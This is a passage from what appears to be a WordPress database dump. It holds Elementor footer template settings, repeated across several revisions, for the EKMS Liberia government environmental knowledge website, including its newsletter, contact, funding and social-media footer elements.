":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":69.964,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.677},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.97,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.112},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.132,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.34},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38610,5662,'_elementor_css','a:7:{s:4:\"time\";i:1770912842;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(27097,3940,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27101,3941,'_elementor_edit_mode','builder'),(27102,3941,'_elementor_template_type','footer'),(27103,3941,'_elementor_version','3.4.0'),(27104,3941,'_elementor_pro_version','3.3.6'),(27105,3941,'_wp_page_template','default'),(27106,3941,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.195},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.158,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.677},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.97,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.112},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.132,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.34},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27108,3941,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27112,3942,'_elementor_edit_mode','builder'),(27113,3942,'_elementor_template_type','footer'),(27114,3942,'_elementor_version','3.4.0'),(27115,3942,'_elementor_pro_version','3.3.6'),(27116,3942,'_wp_page_template','default'),(27117,3942,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the 